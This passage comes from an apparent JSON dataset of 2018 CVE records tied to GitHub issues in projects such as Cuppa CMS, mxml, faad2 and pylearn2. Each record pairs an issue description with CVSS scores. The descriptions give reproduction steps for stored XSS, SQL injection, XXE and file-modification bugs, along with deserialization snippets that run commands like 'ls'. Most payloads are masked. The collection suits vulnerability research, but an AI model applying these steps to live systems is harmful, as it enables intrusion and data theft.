  29125. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/3",
  29126. "Repo_new": "cuppacms/cuppacms",
  29127. "Issue_Created_At": "2018-08-16T12:43:07Z",
  29128. "description": "XSS (via SVG file upload) in APITAG Affected software: APITAG Type of vulnerability: XSS (via SVG file upload) Discovered by: Provensec LLC Website: FILETAG Author: Balvinder Singh Description: SVG files can contain Javascript in APITAG tags. Browsers are smart enough to ignore scripts embedded in SVG files included via IMG tags. However, a direct request for an SVG file will result in the scripts being executed. So an embedded SVG as an attachment in an issue or avatar does not execute the code, but if a user clicks on the attachment the code will execute. Proof of concept: Step1: Login to the cuppa cms. Step2: In the table manager section, add a new file and there is an upload option choose files and upload a malicious SVG file. URL: URLTAG Step3: Now open that file which was saved as NUMBERTAG svg the below output will be shown. URL: FILETAG executed FILETAG",
  29129. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  29130. "severity": "MEDIUM",
  29131. "baseScore": 5.4,
  29132. "impactScore": 2.7,
  29133. "exploitabilityScore": 2.3
  29134. },
  29135. {
  29136. "CVE_ID": "CVE-2018-19919",
  29137. "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/19",
  29138. "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/19",
  29139. "Repo_new": "pixelimity/pixelimity",
  29140. "Issue_Created_At": "2018-11-03T06:55:09Z",
  29141. "description": "Stored XSS in Pixelimity CMS. Affected software: Pixelimity CMS Type of vulnerability: XSS APITAG XSS) Discovered by: Provensec Website: FILETAG Author: Subodh Kumar Description: Subrion CMS is prone to a Persistent Cross Site Scripting attack that allows a malicious user to inject HTML or scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Vulnerable URL: FILETAG Vulnerable parameter: Title Proof of concept NUMBERTAG Login as admin NUMBERTAG Locate URL FILETAG and click on APITAG New NUMBERTAG Put XSS payload in the \"data FILETAG NUMBERTAG isit the link URLTAG to execute payload. FILETAG",
  29142. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  29143. "severity": "MEDIUM",
  29144. "baseScore": 4.8,
  29145. "impactScore": 2.7,
  29146. "exploitabilityScore": 1.7
  29147. },
  29148. {
  29149. "CVE_ID": "CVE-2018-19923",
  29150. "Issue_Url_old": "https://github.com/Venan24/SCMS/issues/2",
  29151. "Issue_Url_new": "https://github.com/venan24/scms/issues/2",
  29152. "Repo_new": "venan24/scms",
  29153. "Issue_Created_At": "2018-12-05T07:42:17Z",
  29154. "description": "smcs NUMBERTAG csrf+storage xss. An issue was discovered in Sales & Company Management System (SCMS) through NUMBERTAG APITAG is a discrepancy in email checking between a component that does email code validation, and a component that is the source client validation. Thus, it is possible to update a database query and due to storage xss. this vulnerable occured via FILETAG FILETAG Enter an arbitrarily email address and click the button,wait a moment,can receive the validation code. FILETAG Now,enter the code and update the email payload like this,click the button . FILETAG capture the package via burp suite and generate the csrf poc FILETAG click the img tag FILETAG",
  29155. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29156. "severity": "HIGH",
  29157. "baseScore": 8.8,
  29158. "impactScore": 5.9,
  29159. "exploitabilityScore": 2.8
  29160. },
  29161. {
  29162. "CVE_ID": "CVE-2018-19925",
  29163. "Issue_Url_old": "https://github.com/Venan24/SCMS/issues/3",
  29164. "Issue_Url_new": "https://github.com/venan24/scms/issues/3",
  29165. "Repo_new": "venan24/scms",
  29166. "Issue_Created_At": "2018-12-05T10:07:57Z",
  29167. "description": "scms NUMBERTAG sql injection. An issue was discovered in Sales & Company Management System (SCMS).It has SQL injection during order operation via the FILETAG O_state parameter. In line NUMBERTAG the parameter state was joined to sql statement CODETAG FILETAG as for the parameter state,it comes from the line NUMBERTAG while scms has been filtered some characters FILETAG It also cause sql injection ERRORTAG FILETAG",
  29168. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29169. "severity": "CRITICAL",
  29170. "baseScore": 9.8,
  29171. "impactScore": 5.9,
  29172. "exploitabilityScore": 3.9
  29173. },
  29174. {
  29175. "CVE_ID": "CVE-2018-19939",
  29176. "Issue_Url_old": "https://github.com/MiCode/Xiaomi_Kernel_OpenSource/issues/972",
  29177. "Issue_Url_new": "https://github.com/micode/xiaomi_kernel_opensource/issues/972",
  29178. "Repo_new": "micode/xiaomi_kernel_opensource",
  29179. "Issue_Created_At": "2018-11-18T12:50:05Z",
  29180. "description": "NULL pointer dereferencing in the touchscreen driver of daisy o oss branch. There is a suspected NULL pointer dereferencing issue ( CVETAG with the daisy o oss branch, in PATHTAG line NUMBERTAG When kmalloc fails (line NUMBERTAG page remains NULL, but kfree is called (line NUMBERTAG which dereferences the NULL pointer. Possible fix can be remove this line.",
  29181. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  29182. "severity": "HIGH",
  29183. "baseScore": 7.5,
  29184. "impactScore": 3.6,
  29185. "exploitabilityScore": 3.9
  29186. },
  29187. {
  29188. "CVE_ID": "CVE-2018-19974",
  29189. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/999",
  29190. "Issue_Url_new": "https://github.com/virustotal/yara/issues/999",
  29191. "Repo_new": "virustotal/yara",
  29192. "Issue_Created_At": "2018-12-08T13:10:44Z",
  29193. "description": "Compiled rules can execute malicious code regardless of PARANOID_EXEC. A malicious compiled rule file could escape YARA's virtual machine and execute arbitrary code despite the added checks introduced by APITAG . This is possible due to the design of the virtual machine, which stores and operates on pointers to APITAG s from the virtual stack, as well as the following bugs: APITAG can be used to read a DWORD from any arbitrary address. the VM scratch memory is uninitialized and could leak important addresses from the real stack. I have requested CVE IDs for theses issues and will update here once they are assigned.",
  29194. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  29195. "severity": "MEDIUM",
  29196. "baseScore": 5.5,
  29197. "impactScore": 3.6,
  29198. "exploitabilityScore": 1.8
  29199. },
  29200. {
  29201. "CVE_ID": "CVE-2018-1999021",
  29202. "Issue_Url_old": "https://github.com/gleez/cms/issues/797",
  29203. "Issue_Url_new": "https://github.com/gleez/cms/issues/797",
  29204. "Repo_new": "gleez/cms",
  29205. "Issue_Created_At": "2018-07-18T11:05:56Z",
  29206. "description": "Stored XSS in profil page. Description : Cross site scripting (XSS) vulnerability in Gleez CMS allow remote attackers (users) to inject arbitrary Javascript or HTML via the profile page editor, which will result in a Stored XSS on his public profile. Vulnerability Type : Stored XSS Attack Vectors NUMBERTAG Go to your profile page editor URLTAG URLTAG NUMBERTAG Set your home page URL to : APITAG Now when someone will check your profile page, APITAG will be executed.",
  29207. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  29208. "severity": "MEDIUM",
  29209. "baseScore": 5.4,
  29210. "impactScore": 2.7,
  29211. "exploitabilityScore": 2.3
  29212. },
  29213. {
  29214. "CVE_ID": "CVE-2018-19991",
  29215. "Issue_Url_old": "https://github.com/alexazhou/VeryNginx/issues/218",
  29216. "Issue_Url_new": "https://github.com/alexazhou/verynginx/issues/218",
  29217. "Repo_new": "alexazhou/verynginx",
  29218. "Issue_Created_At": "2018-12-09T06:45:59Z",
  29219. "description": "\u7f3a\u5c11\u9519\u8bef\u5904\u7406\u5bfc\u81f4waf\u53ef\u4ee5\u88ab\u7ed5\u8fc7. get_post_args \u548c get_uri_args NUMBERTAG APITAG \u6f0f\u6d1e\u8bc1\u660epython\u811a\u672c\uff1a CODETAG \u5b98\u65b9\u5efa\u8bae\u662f\u4f7f\u7528\u4ee5\u4e0b\u4ee3\u7801\u62d2\u7edd\u53c2\u6570\u8fc7\u591a\u7684\u8bf7\u6c42 ERRORTAG",
  29220. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29221. "severity": "CRITICAL",
  29222. "baseScore": 9.8,
  29223. "impactScore": 5.9,
  29224. "exploitabilityScore": 3.9
  29225. },
  29226. {
  29227. "CVE_ID": "CVE-2018-20004",
  29228. "Issue_Url_old": "https://github.com/michaelrsweet/mxml/issues/233",
  29229. "Issue_Url_new": "https://github.com/michaelrsweet/mxml/issues/233",
  29230. "Repo_new": "michaelrsweet/mxml",
  29231. "Issue_Created_At": "2018-12-03T02:38:09Z",
  29232. "description": "Stack buffer overflow in Function mxml_write_node. I used clang NUMBERTAG and APITAG to build FILETAG , this file URLTAG can cause stack buffer overflow in function mxml_write_node in mxml file.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
  29233. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29234. "severity": "HIGH",
  29235. "baseScore": 8.8,
  29236. "impactScore": 5.9,
  29237. "exploitabilityScore": 2.8
  29238. },
  29239. {
  29240. "CVE_ID": "CVE-2018-20005",
  29241. "Issue_Url_old": "https://github.com/michaelrsweet/mxml/issues/234",
  29242. "Issue_Url_new": "https://github.com/michaelrsweet/mxml/issues/234",
  29243. "Repo_new": "michaelrsweet/mxml",
  29244. "Issue_Created_At": "2018-12-03T03:05:01Z",
  29245. "description": "heap use after free in Function APITAG I used clang NUMBERTAG and APITAG to build FILETAG , this file URLTAG can cause heap use after free in APITAG in mxml search.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
  29246. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29247. "severity": "MEDIUM",
  29248. "baseScore": 5.5,
  29249. "impactScore": 3.6,
  29250. "exploitabilityScore": 1.8
  29251. },
  29252. {
  29253. "CVE_ID": "CVE-2018-20006",
  29254. "Issue_Url_old": "https://github.com/qinggan/phpok/issues/3",
  29255. "Issue_Url_new": "https://github.com/qinggan/phpok/issues/3",
  29256. "Repo_new": "qinggan/phpok",
  29257. "Issue_Created_At": "2018-12-08T10:00:23Z",
  29258. "description": "phpok NUMBERTAG Store XSS vulnerability that can get the administrator cookie. Visit the url: URLTAG Step NUMBERTAG Input Xss payload in the title parameter\uff0csuch as ERRORTAG FILETAG ERRORTAG Step NUMBERTAG When the administrator logs in and moves the mouse over to view message information,it will trigger the payload. FILETAG FILETAG",
  29259. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  29260. "severity": "MEDIUM",
  29261. "baseScore": 6.1,
  29262. "impactScore": 2.7,
  29263. "exploitabilityScore": 2.8
  29264. },
  29265. {
  29266. "CVE_ID": "CVE-2018-20009",
  29267. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/88",
  29268. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/88",
  29269. "Repo_new": "domainmod/domainmod",
  29270. "Issue_Created_At": "2018-12-07T12:13:35Z",
  29271. "description": "Two Stored XSS in APITAG NUMBERTAG Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint At the place of ssl provider name, ssl provider's url fields put xss payload \"> APITAG FILETAG Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint At the place of username field put xss payload \"> APITAG FILETAG",
  29272. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  29273. "severity": "MEDIUM",
  29274. "baseScore": 4.8,
  29275. "impactScore": 2.7,
  29276. "exploitabilityScore": 1.7
  29277. },
  29278. {
  29279. "CVE_ID": "CVE-2018-20017",
  29280. "Issue_Url_old": "https://github.com/source-trace/semcms/issues/1",
  29281. "Issue_Url_new": "https://github.com/source-trace/semcms/issues/1",
  29282. "Repo_new": "source-trace/semcms",
  29283. "Issue_Created_At": "2018-12-07T08:17:45Z",
  29284. "description": "There has a stored xss vulnerability. An issue was discovered in semcms APITAG has a stored xss which allow retome attacker to excute web script. POC APITAG Vulnerability point FILETAG APITAG as admin FILETAG APITAG this part FILETAG FILETAG APITAG code FILETAG NUMBERTAG submit and homepage FILETAG",
  29285. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  29286. "severity": "MEDIUM",
  29287. "baseScore": 4.8,
  29288. "impactScore": 2.7,
  29289. "exploitabilityScore": 1.7
  29290. },
  29291. {
  29292. "CVE_ID": "CVE-2018-20027",
  29293. "Issue_Url_old": "https://github.com/lisa-lab/pylearn2/issues/1593",
  29294. "Issue_Url_new": "https://github.com/lisa-lab/pylearn2/issues/1593",
  29295. "Repo_new": "lisa-lab/pylearn2",
  29296. "Issue_Created_At": "2018-12-11T01:34:42Z",
  29297. "description": "APITAG method is vulnerable. import APITAG test_str PATHTAG [\"ls\"]' test_load = APITAG Hi, there is a vulnerability in load methods in APITAG see APITAG above.\u00a0It can execute arbitrary python commands resulting in command execution.",
  29298. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29299. "severity": "CRITICAL",
  29300. "baseScore": 9.8,
  29301. "impactScore": 5.9,
  29302. "exploitabilityScore": 3.9
  29303. },
  29304. {
  29305. "CVE_ID": "CVE-2018-20059",
  29306. "Issue_Url_old": "https://github.com/pippo-java/pippo/issues/486",
  29307. "Issue_Url_new": "https://github.com/pippo-java/pippo/issues/486",
  29308. "Repo_new": "pippo-java/pippo",
  29309. "Issue_Created_At": "2018-12-11T07:08:21Z",
  29310. "description": "xxe. Hello, I am a member of the NUMBERTAG Code Guard team. In our open source project code audit, we found that Pippo has APITAG vulnerabilities. Details are as follows. PATHTAG FILETAG Because the XML parser does not disable dtd, APITAG attacks can occur when content parameters are controlled by malicious attackers",
  29311. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29312. "severity": "CRITICAL",
  29313. "baseScore": 9.8,
  29314. "impactScore": 5.9,
  29315. "exploitabilityScore": 3.9
  29316. },
  29317. {
  29318. "CVE_ID": "CVE-2018-20061",
  29319. "Issue_Url_old": "https://github.com/frappe/erpnext/issues/15337",
  29320. "Issue_Url_new": "https://github.com/frappe/erpnext/issues/15337",
  29321. "Repo_new": "frappe/erpnext",
  29322. "Issue_Created_At": "2018-09-06T23:36:16Z",
  29323. "description": "SQL Injection from API?. If you go here: PATHTAG on any erpnext install you get an SQL syntax error which has me worried of what else can be done with some APITAG names should probably be enclosed in ` either which way if this is not a security issue :)",
  29324. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  29325. "severity": "HIGH",
  29326. "baseScore": 7.5,
  29327. "impactScore": 3.6,
  29328. "exploitabilityScore": 3.9
  29329. },
  29330. {
  29331. "CVE_ID": "CVE-2018-20062",
  29332. "Issue_Url_old": "https://github.com/nangge/noneCms/issues/21",
  29333. "Issue_Url_new": "https://github.com/nangge/nonecms/issues/21",
  29334. "Repo_new": "nangge/nonecms",
  29335. "Issue_Created_At": "2018-12-11T07:08:21Z",
  29336. "description": "There is a vulnerability that can getshell. PATHTAG ERRORTAG ERRORTAG ERRORTAG In the process of processing the route, Config::get(\u2018var_pathinfo\u2019) is used as the receiving process pathinfo, and this value is s by default. then, it will form a calling process: PATHTAG In APITAG ERRORTAG we can use input method POC: URLTAG",
  29337. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29338. "severity": "CRITICAL",
  29339. "baseScore": 9.8,
  29340. "impactScore": 5.9,
  29341. "exploitabilityScore": 3.9
  29342. },
  29343. {
  29344. "CVE_ID": "CVE-2018-20064",
  29345. "Issue_Url_old": "https://github.com/doorgets/CMS/issues/12",
  29346. "Issue_Url_new": "https://github.com/doorgets/cms/issues/12",
  29347. "Repo_new": "doorgets/cms",
  29348. "Issue_Created_At": "2018-12-11T05:57:32Z",
  29349. "description": "Modify the contents of the file at will. Create a file under the c APITAG is test FILETAG poc\uff1a FILETAG Modify the contents of the file in FILETAG by poc ERRORTAG FILETAG Of course, you can also modify the contents of any file to make the web unusable.",
  29350. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  29351. "severity": "HIGH",
  29352. "baseScore": 7.5,
  29353. "impactScore": 3.6,
  29354. "exploitabilityScore": 3.9
  29355. },
  29356. {
  29357. "CVE_ID": "CVE-2018-20094",
  29358. "Issue_Url_old": "https://github.com/xuxueli/xxl-conf/issues/61",
  29359. "Issue_Url_new": "https://github.com/xuxueli/xxl-conf/issues/61",
  29360. "Repo_new": "xuxueli/xxl-conf",
  29361. "Issue_Created_At": "2018-12-05T07:40:26Z",
  29362. "description": "\u8def\u5f84\u904d\u5386\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG APITAG APITAG APITAG = \"keys\", required = false) APITAG keys \u63a5\u6536\u4e86\u8bf7\u6c42\u4e2d\u7684\u53c2\u6570keys\uff0c\u800c\u8be5\u53c2\u6570\u662f\u53d7\u7528\u6237\u63a7\u5236\u7684\u3002 FILETAG APITAG APITAG",
  29363. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  29364. "severity": "HIGH",
  29365. "baseScore": 7.5,
  29366. "impactScore": 3.6,
  29367. "exploitabilityScore": 3.9
  29368. },
  29369. {
  29370. "CVE_ID": "CVE-2018-20095",
  29371. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/341",
  29372. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/341",
  29373. "Repo_new": "axiomatic-systems/bento4",
  29374. "Issue_Created_At": "2018-12-11T09:25:26Z",
  29375. "description": "Allocate for large amounts of memory failed in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to Memory allocation failed in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
  29376. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29377. "severity": "MEDIUM",
  29378. "baseScore": 6.5,
  29379. "impactScore": 3.6,
  29380. "exploitabilityScore": 2.8
  29381. },
  29382. {
  29383. "CVE_ID": "CVE-2018-20096",
  29384. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/590",
  29385. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/590",
  29386. "Repo_new": "exiv2/exiv2",
  29387. "Issue_Created_At": "2018-12-10T03:07:29Z",
  29388. "description": "Several bugs in exi NUMBERTAG rc3. I have tested them in latest version NUMBERTAG RC NUMBERTAG exi NUMBERTAG pR pngimage heap bof poc NUMBERTAG URLTAG NUMBERTAG exi NUMBERTAG Y NUMBERTAG O NUMBERTAG D NUMBERTAG adjust tiffimage_int out of bound read poc NUMBERTAG URLTAG NUMBERTAG exi NUMBERTAG M'set APITAG lang=\"de DE\" Euros' jp2image heap bof poc NUMBERTAG URLTAG NUMBERTAG iptcprint abort poc NUMBERTAG URLTAG NUMBERTAG exi NUMBERTAG insert jp2image infiniteloop poc NUMBERTAG URLTAG And, more info can be found at URLTAG",
  29389. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29390. "severity": "MEDIUM",
  29391. "baseScore": 6.5,
  29392. "impactScore": 3.6,
  29393. "exploitabilityScore": 2.8
  29394. },
  29395. {
  29396. "CVE_ID": "CVE-2018-20133",
  29397. "Issue_Url_old": "https://github.com/dexter2206/ymlref/issues/2",
  29398. "Issue_Url_new": "https://github.com/dexter2206/ymlref/issues/2",
  29399. "Repo_new": "dexter2206/ymlref",
  29400. "Issue_Created_At": "2018-12-14T00:08:11Z",
  29401. "description": "APITAG method is vulnerable. import ymlref.api test_str PATHTAG [\"dir\"]' APITAG Hi, there is a vulnerability in load methods in APITAG see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  29402. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  29403. "severity": "CRITICAL",
  29404. "baseScore": 9.8,
  29405. "impactScore": 5.9,
  29406. "exploitabilityScore": 3.9
  29407. },
  29408. {
  29409. "CVE_ID": "CVE-2018-20145",
  29410. "Issue_Url_old": "https://github.com/eclipse/mosquitto/issues/1073",
  29411. "Issue_Url_new": "https://github.com/eclipse/mosquitto/issues/1073",
  29412. "Repo_new": "eclipse/mosquitto",
  29413. "Issue_Created_At": "2018-12-07T13:09:07Z",
  29414. "description": "Mosquitto ignores acl_file on default listener if per_listener_settings=true. When mosquitto is configured as follows: APITAG Then the default listener (on port NUMBERTAG ignores the acl_file. This can easily confirmed by specifying a non existing acl file. Mosquitto will startup fine, without complaining about the non existing file. And when trying to send messages, there are indeed no acl's effective. This is a potential security risk!",
  29415. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  29416. "severity": "HIGH",
  29417. "baseScore": 7.5,
  29418. "impactScore": 3.6,
  29419. "exploitabilityScore": 3.9
  29420. },
  29421. {
  29422. "CVE_ID": "CVE-2018-20157",
  29423. "Issue_Url_old": "https://github.com/OpenRefine/OpenRefine/issues/1907",
  29424. "Issue_Url_new": "https://github.com/openrefine/openrefine/issues/1907",
  29425. "Repo_new": "openrefine/openrefine",
  29426. "Issue_Created_At": "2018-12-14T14:57:37Z",
  29427. "description": "XXE Vulnerability in creating project. Describe the bug APITAG NUMBERTAG and below) has a XXE URLTAG vulnerability, that can be triggered through a data import. It is possible to steal data from an APITAG user. Please consider disabling external DTDs URLTAG . To Reproduce See the video (zipped because of GH file extension restrictions) FILETAG Current Results File content is send over FTP, no feedback is shown to the user. Desktop (please complete the following information): Tested on (desktop version is not important) ERRORTAG APITAG (please complete the following information): Version NUMBERTAG and below) Datasets ext.dtd APITAG FILETAG APITAG Additonal info Sorry that i was a bit inactive during the last issue :).",
  29428. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  29429. "severity": "HIGH",
  29430. "baseScore": 7.5,
  29431. "impactScore": 3.6,
  29432. "exploitabilityScore": 3.9
  29433. },
  29434. {
  29435. "CVE_ID": "CVE-2018-20164",
  29436. "Issue_Url_old": "https://github.com/ua-parser/uap-core/issues/332",
  29437. "Issue_Url_new": "https://github.com/ua-parser/uap-core/issues/332",
  29438. "Repo_new": "ua-parser/uap-core",
  29439. "Issue_Created_At": "2018-07-30T13:42:04Z",
  29440. "description": "Performance issue with backtracking caused by some regexes. Hi! We are happy users of uap core via URLTAG but we have recently noticed that some regexes may lead to excessive backtracking. The regex that caused some issue for us is the following: ^(. APITAG APITAG A simple python script like the following hangs on my laptop: CODETAG The main problem seems to be backtracking caused by the various blocks with .?, that doesn't happen if the regex is split into multiple ones for example: APITAG The example that I brought up is of course a corner case, but even shorter strings with the same format can cause slow downs in parsing or hanging. It would be great to find a solution that is probably more verbose but that doesn't lead to these issues. Thanks in advance! Luca",
  29441. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  29442. "severity": "MEDIUM",
  29443. "baseScore": 5.3,
  29444. "impactScore": 1.4,
  29445. "exploitabilityScore": 3.9
  29446. },
  29447. {
  29448. "CVE_ID": "CVE-2018-20186",
  29449. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/342",
  29450. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/342",
  29451. "Repo_new": "axiomatic-systems/bento4",
  29452. "Issue_Created_At": "2018-12-17T08:48:55Z",
  29453. "description": "Allocate for large amounts of memory failed in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to Memory allocation failed in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash2.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
  29454. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29455. "severity": "MEDIUM",
  29456. "baseScore": 6.5,
  29457. "impactScore": 3.6,
  29458. "exploitabilityScore": 2.8
  29459. },
  29460. {
  29461. "CVE_ID": "CVE-2018-20190",
  29462. "Issue_Url_old": "https://github.com/sass/libsass/issues/2786",
  29463. "Issue_Url_new": "https://github.com/sass/libsass/issues/2786",
  29464. "Repo_new": "sass/libsass",
  29465. "Issue_Created_At": "2018-12-04T05:34:36Z",
  29466. "description": "Null pointer dereference in APITAG ) APITAG I fuzzed and found another null pointer dereference problem in APITAG ) APITAG The problem exists in both the NUMBERTAG ersion and the master branch ( PATHTAG ), with the same crash stack. Build libsass/sassc with APITAG APITAG Run APITAG and program crashes. (sass_npd is at here: URLTAG Crash stack Crash stack (of master branch): ERRORTAG It seems that in function APITAG , the right variable (not Null) is casted and becomes a Null APITAG APITAG at line APITAG . CODETAG",
  29467. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29468. "severity": "MEDIUM",
  29469. "baseScore": 6.5,
  29470. "impactScore": 3.6,
  29471. "exploitabilityScore": 2.8
  29472. },
  29473. {
  29474. "CVE_ID": "CVE-2018-20194",
  29475. "Issue_Url_old": "https://github.com/knik0/faad2/issues/21",
  29476. "Issue_Url_new": "https://github.com/knik0/faad2/issues/21",
  29477. "Repo_new": "knik0/faad2",
  29478. "Issue_Created_At": "2018-12-17T05:12:17Z",
  29479. "description": "stack buffer underflow in function APITAG Hi, i found a stack buffer overflow bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29480. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29481. "severity": "HIGH",
  29482. "baseScore": 7.8,
  29483. "impactScore": 5.9,
  29484. "exploitabilityScore": 1.8
  29485. },
  29486. {
  29487. "CVE_ID": "CVE-2018-20196",
  29488. "Issue_Url_old": "https://github.com/knik0/faad2/issues/19",
  29489. "Issue_Url_new": "https://github.com/knik0/faad2/issues/19",
  29490. "Repo_new": "knik0/faad2",
  29491. "Issue_Created_At": "2018-12-17T04:08:19Z",
  29492. "description": "stack buffer overflow in function APITAG Hi, i found a stack buffer overflow bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29493. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29494. "severity": "HIGH",
  29495. "baseScore": 7.8,
  29496. "impactScore": 5.9,
  29497. "exploitabilityScore": 1.8
  29498. },
  29499. {
  29500. "CVE_ID": "CVE-2018-20197",
  29501. "Issue_Url_old": "https://github.com/knik0/faad2/issues/20",
  29502. "Issue_Url_new": "https://github.com/knik0/faad2/issues/20",
  29503. "Repo_new": "knik0/faad2",
  29504. "Issue_Created_At": "2018-12-17T04:11:39Z",
  29505. "description": "stack buffer underflow in function APITAG Hi, i found a stack buffer overflow bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29506. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  29507. "severity": "HIGH",
  29508. "baseScore": 7.8,
  29509. "impactScore": 5.9,
  29510. "exploitabilityScore": 1.8
  29511. },
  29512. {
  29513. "CVE_ID": "CVE-2018-20198",
  29514. "Issue_Url_old": "https://github.com/knik0/faad2/issues/23",
  29515. "Issue_Url_new": "https://github.com/knik0/faad2/issues/23",
  29516. "Repo_new": "knik0/faad2",
  29517. "Issue_Created_At": "2018-12-17T06:17:36Z",
  29518. "description": "Null pointer dereference vulnerability in APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function ifilter_bank.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  29519. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  29520. "severity": "MEDIUM",
  29521. "baseScore": 5.5,
  29522. "impactScore": 3.6,
  29523. "exploitabilityScore": 1.8
  29524. },
  29525. {
  29526. "CVE_ID": "CVE-2018-20200",
  29527. "Issue_Url_old": "https://github.com/square/okhttp/issues/4967",
  29528. "Issue_Url_new": "https://github.com/square/okhttp/issues/4967",
  29529. "Repo_new": "square/okhttp",
  29530. "Issue_Created_At": "2019-04-19T09:16:04Z",
  29531. "description": "CVETAG : APITAG allows man in the middle attackers to bypass certificate pinning. Apparently there was CVETAG CVETAG for an issue described as > APITAG in APITAG NUMBERTAG through NUMBERTAG allows man in the middle attackers to bypass certificate pinning by changing APITAG and the boolean values while hooking the application. A report is at URLTAG was this forwarded already?",
  29532. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  29533. "severity": "MEDIUM",
  29534. "baseScore": 5.9,
  29535. "impactScore": 3.6,
  29536. "exploitabilityScore": 2.2
  29537. },
  29538. {
  29539. "CVE_ID": "CVE-2018-20201",
  29540. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1587",
  29541. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1587",
  29542. "Repo_new": "espruino/espruino",
  29543. "Issue_Created_At": "2018-12-18T02:36:24Z",
